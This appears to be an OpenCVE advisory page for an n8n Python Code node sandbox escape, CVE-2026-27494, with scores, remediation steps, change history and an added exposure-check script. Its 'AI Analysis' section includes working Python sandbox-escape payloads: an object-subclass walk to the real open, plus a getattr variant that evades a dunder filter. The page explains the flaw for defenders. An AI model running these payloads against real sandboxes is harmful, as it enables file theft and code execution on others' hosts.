Description
n8n is an open source workflow automation platform. Prior to versions 2.10.1, 2.9.3, and 1.123.22, an authenticated user with permission to create or modify workflows could use the Python Code node to escape the sandbox. The sandbox did not sufficiently restrict access to certain built-in Python objects, allowing an attacker to exfiltrate file contents or achieve RCE. On instances using internal Task Runners (the default runner mode), this could result in full compromise of the n8n host. On instances using external Task Runners, the attacker might gain access to or impact other tasks executed on the Task Runner. Task Runners must be enabled using `N8N_RUNNERS_ENABLED=true` for the issue to be reachable. The issue has been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22; users should upgrade to the fixed release of their branch or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: limit workflow creation and editing permissions to fully trusted users only, and/or disable the Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable (this removes the whole Code node, JavaScript mode included, from the instance). These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Published: 2026-02-25
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution / Arbitrary File Read via Python Code node sandbox escape
Action: Patch Now
AI Analysis

Impact

An authenticated user with permission to create or modify a workflow can write Python in the Code node that bypasses the sandbox restriction, because the sandbox did not sufficiently restrict access to certain built-in Python objects. The flaw permits reading arbitrary files reachable by the Task Runner process or, in the worst case, executing arbitrary code there. It is classified as CWE‑497 (Exposure of Sensitive System Information to an Unauthorized Control Sphere). With the internal Task Runner, the default runner mode, the runner shares the n8n host, so the outcome is exfiltration of sensitive data or full compromise of the system; with an external Task Runner the blast radius is the runner itself and the other tasks it executes.
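To make the CWE‑497 point concrete, here is an added example of why a sandbox built by removing "dangerous" builtins from the namespace cannot stop access to the objects the advisory refers to. It is not n8n's Code node sandbox and not the reported exploit: the denylist_sandbox, guarded_sandbox and has_dunder_access functions and both payload strings are constructed for this page, and the walk from object to os._wrap_close.__init__.__globals__ is the generic CPython object-graph technique, not a step taken from the advisory. The second payload shows that an AST-level filter on dunder names does not close the hole either.

```python
"""Why a builtins denylist is not a Python sandbox (CWE-497 illustration).

Added example for this page; NOT n8n's Code node sandbox and NOT the reported
exploit. The "sandbox" is a deliberately minimal stand-in for the design class
the advisory describes (user code exec'd with dangerous builtins removed); the
escape is the generic CPython object-graph walk such a filter leaves reachable.
"""
import ast
import builtins
import os  # loaded in every CPython process anyway; imported so the walk is deterministic

# Names a naive filter would strip from the sandboxed namespace.
DENIED = {"open", "__import__", "eval", "exec", "compile", "input", "breakpoint"}


def denylist_sandbox(code: str) -> dict:
    """Run user code with the DENIED builtins removed. Returns its namespace."""
    allowed = {n: getattr(builtins, n) for n in dir(builtins) if n not in DENIED}
    namespace = {"__builtins__": allowed}
    exec(code, namespace)
    return namespace


# Constructed payload. It names none of the DENIED builtins, yet reaches the
# real `open` via object -> subclasses -> os._wrap_close.__init__.__globals__.
ESCAPE = """
subclasses = ().__class__.__base__.__subclasses__()
wrap = [c for c in subclasses if c.__name__ == '_wrap_close'][0]
os_globals = wrap.__init__.__globals__          # namespace of the os module
real_open = os_globals['sys'].modules['builtins'].open
"""


def has_dunder_access(code: str) -> bool:
    """Defense-in-depth check: reject any attribute or name spelled __x__."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return True
        if isinstance(node, ast.Name) and node.id.startswith("__"):
            return True
    return False


def guarded_sandbox(code: str) -> dict:
    """denylist_sandbox plus the AST check. Still not a security boundary."""
    if has_dunder_access(code):
        raise ValueError("dunder access rejected")
    return denylist_sandbox(code)


# Constructed payload that passes has_dunder_access: the dunder names are
# assembled from string fragments at run time and resolved with getattr.
ESCAPE_VIA_GETATTR = """
cls = getattr((), '__cl' + 'ass__')
subclasses = getattr(getattr(cls, '__ba' + 'se__'), '__subcl' + 'asses__')()
wrap = [c for c in subclasses if getattr(c, '__na' + 'me__') == '_wrap_close'][0]
os_globals = getattr(getattr(wrap, '__in' + 'it__'), '__glob' + 'als__')
real_open = os_globals['sys'].modules['builtins'].open
"""


def demo() -> dict:
    """Summarise which payload gets past which filter."""
    return {
        "denylist_escaped": denylist_sandbox(ESCAPE)["real_open"] is builtins.open,
        "ast_check_blocks_literal_dunders": has_dunder_access(ESCAPE),
        "ast_check_misses_getattr_variant": not has_dunder_access(ESCAPE_VIA_GETATTR),
        "guarded_escaped": guarded_sandbox(ESCAPE_VIA_GETATTR)["real_open"] is builtins.open,
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

Every entry of demo() comes back True: the filter removed `open`, and the payload still ends up holding the real builtins.open, which is exactly the arbitrary-file-read primitive the title names. The practical conclusion matches the advisory's own distinction between runner modes: name filtering inside the interpreter is not a security boundary, so the durable controls are the upgrade and isolating the Task Runner process (external runners with minimal host privileges).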

Affected Systems

The affected product is n8n‑io's n8n workflow platform. All versions prior to 2.10.1, 2.9.3, and 1.123.22 are vulnerable; the fix ships in those three releases and later ones on each branch. Exposure additionally requires Task Runners to be enabled (`N8N_RUNNERS_ENABLED=true`) and the Python Code node to be available to workflow editors.

Risk and Exploitability

The CNA-assigned CVSS v4.0 score is 7.1 (AV:N/AC:L/AT:N/PR:L/UI:N with high confidentiality impact only, matching the arbitrary-file-read title); NVD's separate CVSS v3.1 assessment is 9.9 (scope changed, C:H/I:H/A:H), which reflects the RCE and host-compromise outcome. EPSS is below 1 %, indicating a low but non‑zero estimated likelihood of exploitation in the wild, and the CVE is not listed in the CISA KEV catalog. The attack vector is authenticated workflow creation or editing with Task Runners enabled: with internal Task Runners the attacker can read sensitive files or fully compromise the host; with external Task Runners the impact is confined to the runner and the other tasks it executes. Treat the risk as moderate with high potential impact wherever users who are not fully trusted can edit workflows.

Generated by OpenCVE AI on April 17, 2026 at 14:46 UTC.

Remediation

The vendor has released fixes in n8n 2.10.1, 2.9.3, and 1.123.22. Until the upgrade is applied, the vendor-listed temporary mitigations are to restrict workflow creation and editing to fully trusted users and/or to disable the Code node through `NODES_EXCLUDE`; neither fully remediates the issue.

OpenCVE Recommended Actions

  • Upgrade to the fixed release for your branch (n8n 1.123.22, 2.9.3, or 2.10.1) or later to apply the official fix
  • Restrict workflow creation and editing to fully trusted users only; the exploit requires an authenticated user with those rights
  • As a temporary workaround, disable the Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable (this removes the Code node entirely, JavaScript mode included, and breaks workflows that depend on it); note that the issue is only reachable when Task Runners are enabled (`N8N_RUNNERS_ENABLED=true`)
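As an added example, not part of the advisory or of n8n, a small exposure check that encodes the fixed versions and the two environment variables named above. The function names (parse_version, is_fixed, excluded_nodes, runners_enabled, assess) are chosen for this page; the branch logic for 2.0 to 2.8 and the comma-separated fallback for NODES_EXCLUDE are assumptions and marked as such in the code.

```python
"""Exposure check for the remediation steps on this page.

Added example; not n8n's code and not from the advisory. It encodes the fixed
releases named on the page (1.123.22, 2.9.3, 2.10.1) and the two environment
variable facts the description states: the issue needs N8N_RUNNERS_ENABLED=true,
and excluding n8n-nodes-base.code via NODES_EXCLUDE is a stop-gap only.
Restricting who may edit workflows is an access-control decision this script
cannot observe, so it is not checked here.
"""
import json
import os
import re

CODE_NODE = "n8n-nodes-base.code"


def parse_version(v: str) -> tuple:
    """'v2.10.1' or '2.10.1-rc.1' -> (2, 10, 1); rejects anything else."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", v.strip())
    if not m:
        raise ValueError(f"unrecognised n8n version: {v!r}")
    return tuple(int(x) for x in m.groups())


def is_fixed(version: str) -> bool:
    """True if `version` carries the fix.

    Per the advisory: 1.x is fixed from 1.123.22, 2.9.x from 2.9.3, 2.10.x from
    2.10.1. Assumptions: 2.0 to 2.8 have no fixed release and must move to a
    fixed branch; anything newer than 2.10.1 includes the fix.
    """
    v = parse_version(version)
    major, minor = v[0], v[1]
    if major == 1:
        return v >= (1, 123, 22)
    if major == 2:
        if minor == 9:
            return v >= (2, 9, 3)
        if minor >= 10:
            return v >= (2, 10, 1)
        return False
    return major > 2


def excluded_nodes(env) -> list:
    """Parse NODES_EXCLUDE. n8n documents the value as a JSON array string; a
    plain comma-separated list is accepted too (assumption, for hand-edited
    configs) so a malformed value does not silently read as 'nothing excluded'."""
    raw = env.get("NODES_EXCLUDE", "").strip()
    if not raw:
        return []
    try:
        parsed = json.loads(raw)
        if isinstance(parsed, list):
            return [str(x).strip() for x in parsed]
    except json.JSONDecodeError:
        pass
    return [x.strip() for x in raw.split(",") if x.strip()]


def runners_enabled(env):
    """True/False when N8N_RUNNERS_ENABLED is set; None when unset, because the
    default differs between n8n releases and an unset value must be treated as
    unknown rather than as 'disabled'."""
    raw = env.get("N8N_RUNNERS_ENABLED")
    if raw is None:
        return None
    return raw.strip().lower() == "true"


def assess(version: str, env) -> str:
    """Classify an instance from its version and environment."""
    if is_fixed(version):
        return "patched"
    if runners_enabled(env) is False:
        return "not-exposed: task runners explicitly disabled"
    if CODE_NODE in excluded_nodes(env):
        return "mitigated: Code node excluded, upgrade still required"
    return "exposed: upgrade now"


if __name__ == "__main__":
    # Constructed sample environment; on a real host pass os.environ and the
    # version reported by the running instance.
    sample_env = {"N8N_RUNNERS_ENABLED": "true", "NODES_EXCLUDE": '["n8n-nodes-base.code"]'}
    print(assess("2.9.2", sample_env))
    print(assess("2.9.2", os.environ))
```

An unset N8N_RUNNERS_ENABLED deliberately does not downgrade the result: only an explicit "false" counts as not exposed, so a host whose default enables runners is not misreported.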



Advisories

Source: GitHub GHSA
ID: GHSA-mmgg-m5j7-f83h
Title: n8n has Arbitrary File Read via Python Code Node Sandbox Escape
History

Thu, 05 Mar 2026 16:30:00 +0000

Type: CPEs
  Values Added: cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*

Type: Metrics (cvssV3_1)
  Values Added: {'score': 9.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}


Fri, 27 Feb 2026 16:15:00 +0000

Type: Metrics (ssvc)
  Values Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 26 Feb 2026 13:30:00 +0000

Type: First Time appeared
  Values Added: N8n; N8n n8n

Type: Vendors & Products
  Values Added: N8n; N8n n8n


Wed, 25 Feb 2026 22:30:00 +0000

Type: Description
  Values Added: n8n is an open source workflow automation platform. Prior to versions 2.10.1, 2.9.3, and 1.123.22, an authenticated user with permission to create or modify workflows could use the Python Code node to escape the sandbox. The sandbox did not sufficiently restrict access to certain built-in Python objects, allowing an attacker to exfiltrate file contents or achieve RCE. On instances using internal Task Runners (default runner mode), this could result in full compromise of the n8n host. On instances using external Task Runners, the attacker might gain access to or impact other tasks executed on the Task Runner. Task Runners must be enabled using `N8N_RUNNERS_ENABLED=true`. The issue has been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations. Limit workflow creation and editing permissions to fully trusted users only, and/or disable the Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Type: Title
  Values Added: n8n has Arbitrary File Read via Python Code Node Sandbox Escape

Type: Weaknesses
  Values Added: CWE-497

Type: References

Type: Metrics (cvssV4_0)
  Values Added: {'score': 7.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:28:57.625Z

Reserved: 2026-02-19T19:46:03.542Z

Link: CVE-2026-27494

Vulnrichment

Updated: 2026-02-26T20:28:52.988Z

NVD

Status : Analyzed

Published: 2026-02-25T23:16:20.677

Modified: 2026-03-05T16:22:42.753

Link: CVE-2026-27494

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T15:00:11Z

Weaknesses